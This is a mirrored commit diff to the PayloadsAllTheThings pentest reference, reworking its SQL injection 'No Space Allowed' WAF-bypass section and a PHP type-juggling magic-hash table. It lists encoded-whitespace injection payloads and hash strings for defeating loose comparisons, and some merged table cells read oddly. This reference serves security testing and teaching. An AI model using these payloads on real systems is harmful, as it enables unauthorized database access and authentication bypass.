gitea-mirror/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2025-12-05 20:40:04 -08:00
Code Issues Packages Projects Releases Wiki Activity

SQL injection - Generic Bypass (Space)

Browse Source
This commit is contained in:
Swissky
2025-07-26 22:54:45 +02:00
parent ac73b0c619
commit 7faf14a960
3 changed files with 36 additions and 27 deletions
Download Patch File Download Diff File Expand all files Collapse all files

3
README.md
View File

@@ -2,9 +2,8 @@
A list of useful payloads and bypasses for Web Application Security.
Feel free to improve with your payloads and techniques !
I :heart: pull requests :)
You can also contribute with a :beers: IRL, or using the sponsor button
You can also contribute with a :beers: IRL, or using the sponsor button.
[![Sponsor](https://img.shields.io/static/v1?label=Sponsor&message=%E2%9D%A4&logo=GitHub&link=https://github.com/sponsors/swisskyrepo)](https://github.com/sponsors/swisskyrepo)
[![Tweet](https://img.shields.io/twitter/url/http/shields.io.svg?style=social)](https://twitter.com/intent/tweet?text=Payloads%20All%20The%20Things,%20a%20list%20of%20useful%20payloads%20and%20bypasses%20for%20Web%20Application%20Security%20-%20by%20@pentest_swissky&url=https://github.com/swisskyrepo/PayloadsAllTheThings/)

49
SQL Injection/README.md
View File

@@ -31,7 +31,7 @@
* [Second Order SQL Injection](#second-order-sql-injection)
* [PDO Prepared Statements](#pdo-prepared-statements)
* [Generic WAF Bypass](#generic-waf-bypass)
* [White Spaces](#white-spaces)
* [No Space Allowed](#no-space-allowed)
* [No Comma Allowed](#no-comma-allowed)
* [No Equal Allowed](#no-equal-allowed)
* [Case Modification](#case-modification)
@@ -439,30 +439,37 @@ PDO allows for binding of input parameters, which ensures that user data is prop
## Generic WAF Bypass
### White Spaces
### No Space Allowed
Bypass using whitespace alternatives.
Some web applications attempt to secure their SQL queries by blocking or stripping space characters to prevent simple SQL injection attacks. However, attackers can bypass these filters by using alternative whitespace characters, comments, or creative use of parentheses.
| Bypass | Technique |
| ------------------------ | ---------------------- |
| `?id=1%09and%091=1%09--` | Whitespace alternative |
| `?id=1%0Aand%0A1=1%0A--` | Whitespace alternative |
| `?id=1%0Band%0B1=1%0B--` | Whitespace alternative |
| `?id=1%0Cand%0C1=1%0C--` | Whitespace alternative |
| `?id=1%0Dand%0D1=1%0D--` | Whitespace alternative |
| `?id=1%A0and%A01=1%A0--` | Whitespace alternative |
| `?id=1%A0and%A01=1%A0--` | Whitespace alternative |
#### Alternative Whitespace Characters
| DBMS | ASCII characters in hexadecimal |
| ---------- | ------------------------------- |
| SQLite3 | 0A, 0D, 0C, 09, 20 |
| MySQL 5 | 09, 0A, 0B, 0C, 0D, A0, 20 |
| MySQL 3 | 01, 02, 03, 04, 05, 06, 07, 08, 09, 0A, 0B, 0C, 0D, 0E, 0F, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 1A, 1B, 1C, 1D, 1E, 1F, 20, 7F, 80, 81, 88, 8D, 8F, 90, 98, 9D, A0 |
| PostgreSQL | 0A, 0D, 0C, 09, 20 |
| Oracle 11g | 00, 0A, 0D, 0C, 09, 20 |
| MSSQL | 01, 02, 03, 04, 05, 06, 07, 08, 09, 0A, 0B, 0C, 0D, 0E, 0F, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 1A, 1B, 1C, 1D, 1E, 1F, 20 |
Most databases interpret certain ASCII control characters and encoded spaces (such as tabs, newlines, etc.) as whitespace in SQL statements. By encoding these characters, attackers can often evade space-based filters.
Bypass using comments and parenthesis.
| Example Payload | Description |
|-------------------------------|----------------------------------|
| `?id=1%09and%091=1%09--` | `%09` is tab (`\t`) |
| `?id=1%0Aand%0A1=1%0A--` | `%0A` is line feed (`\n`) |
| `?id=1%0Band%0B1=1%0B--` | `%0B` is vertical tab |
| `?id=1%0Cand%0C1=1%0C--` | `%0C` is form feed |
| `?id=1%0Dand%0D1=1%0D--` | `%0D` is carriage return (`\r`) |
| `?id=1%A0and%A01=1%A0--` | `%A0` is non-breaking space |
**ASCII Whitespace Support by Database**:
| DBMS | Supported Whitespace Characters (Hex) |
|--------------|----------------------------------------------___-|
| SQLite3 | 0A, 0D, 0C, 09, 20 |
| MySQL 5 | 09, 0A, 0B, 0C, 0D, A0, 20 |
| MySQL 3 | 011F, 20, 7F, 80, 81, 88, 8D, 8F, 90, 98, 9D, A0|
| PostgreSQL | 0A, 0D, 0C, 09, 20 |
| Oracle 11g | 00, 0A, 0D, 0C, 09, 20 |
| MSSQL | 011F, 20 |
#### Bypassing with Comments and Parentheses
SQL allows comments and grouping, which can break up keywords and queries, thus defeating space filters:
| Bypass | Technique |
| ----------------------------------------- | -------------------- |

11
Type Juggling/README.md
View File

@@ -27,14 +27,14 @@
| `'0010e2' == '1e3'` | true |
| `'0xABCdef' == ' 0xABCdef'` | true (PHP 5.0) / false (PHP 7.0) |
| `'0xABCdef' == ' 0xABCdef'` | true (PHP 5.0) / false (PHP 7.0) |
| `'0x01' == 1` | true (PHP 5.0) / false (PHP 7.0) |
| `'0x01' == 1` | true (PHP 5.0) / false (PHP 7.0) |
| `'0x1234Ab' == '1193131'` | true (PHP 5.0) / false (PHP 7.0) |
| `'123' == 123` | true |
| `'123a' == 123` | true |
| `'abc' == 0` | true |
| `'' == 0 == false == NULL` | true |
| `'' == 0` | true |
| `0 == false` | true |
| `0 == false` | true |
| `false == NULL` | true |
| `NULL == ''` | true |
@@ -65,7 +65,7 @@ Loose Type comparisons occurs in many languages:
> Magic hashes arise due to a quirk in PHP's type juggling, when comparing string hashes to integers. If a string hash starts with "0e" followed by only numbers, PHP interprets this as scientific notation and the hash is treated as a float in comparison operations.
| Hash | "Magic" Number / String | Magic Hash | Found By / Description |
| ---- | -------------------------- |:---------------------------------------------:| -------------:|
| ---- | -------------------------- | --------------------------------------------- | -------------|
| MD4 | gH0nAdHk | 0e096229559581069251163783434175 | [@spaze](https://github.com/spaze/hashes/blob/master/md4.md) |
| MD4 | IiF+hTai | 00e90130237707355082822449868597 | [@spaze](https://github.com/spaze/hashes/blob/master/md4.md) |
| MD5 | 240610708 | 0e462097431906509019562988736854 | [@spazef0rze](https://twitter.com/spazef0rze/status/439352552443084800) |
@@ -73,7 +73,10 @@ Loose Type comparisons occurs in many languages:
| MD5 | 0e1137126905 | 0e291659922323405260514745084877 | [@spazef0rze](https://twitter.com/spazef0rze/status/439352552443084800) |
| MD5 | 0e215962017 | 0e291242476940776845150308577824 | [@spazef0rze](https://twitter.com/spazef0rze/status/439352552443084800) |
| MD5 | 129581926211651571912466741651878684928 | 06da5430449f8f6f23dfc1276f722738 | Raw: ?T0D??o#??'or'8.N=? |
| SHA1 | 10932435112 | 0e07766915004133176347055865026311692244 | Independently found by Michael A. Cleverly & Michele Spagnuolo & Rogdham |
| Hash | "Magic" Number / String | Magic Hash | Found By / Description |
| ---- | -------------------------- | --------------------------------------------- | -------------|
| SHA1 | 10932435112 | 0e07766915004133176347055865026311692244 | Michael A. Cleverly, Michele Spagnuolo & Rogdham |
| SHA-224 | 10885164793773 | 0e281250946775200129471613219196999537878926740638594636 | [@TihanyiNorbert](https://twitter.com/TihanyiNorbert/status/1138075224010833921) |
| SHA-256 | 34250003024812 | 0e46289032038065916139621039085883773413820991920706299695051332 | [@TihanyiNorbert](https://twitter.com/TihanyiNorbert/status/1148586399207178241) |
| SHA-256 | TyNOQHUS | 0e66298694359207596086558843543959518835691168370379069085300385 | [@Chick3nman512](https://twitter.com/Chick3nman512/status/1150137800324526083) |